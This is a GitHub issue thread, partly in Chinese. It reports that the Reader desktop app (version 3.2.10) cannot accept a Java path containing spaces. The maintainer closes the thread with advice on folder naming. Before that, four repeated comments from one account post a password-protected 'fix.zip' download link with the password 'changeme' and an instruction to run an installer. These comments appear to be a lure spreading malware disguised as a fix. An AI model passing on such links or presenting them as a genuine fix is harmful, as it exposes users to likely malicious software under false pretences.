### ISSUE TITLE
Java路径含空格，无法识别。错误：os error 5

### ISSUE THREAD

**Issue by insbire** [hectorqin/reader#583]
**Describe the bug 描述你遇到的问题**
设置Java路径时，报错。
![image](https://github.com/user-attachments/assets/e696abb8-427c-4a42-b868-28b35d766f02)

Java环境已安装。
![image](https://github.com/user-attachments/assets/263aa4ba-0f56-41c0-8838-f629c6e34bc8)

盲猜，是因为路径中包含空格的原因。

**To Reproduce 如何重现问题**
1. 安装Reader.Desktop_3.2.10_x64_zh-CN.msi文件，
2. 进入软件，
3. 设置Java路径时出错。

**Expected behavior  期待修复的效果**
允许路径中包含空格。

**版本说明**
 - OS: [e.g. win]  Win11
 - Program Version 说明软件版本  Reader.Desktop_3.2.10_x64

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hectorqin** [comment]
最好不要把java放在有空格或者中文的目录下
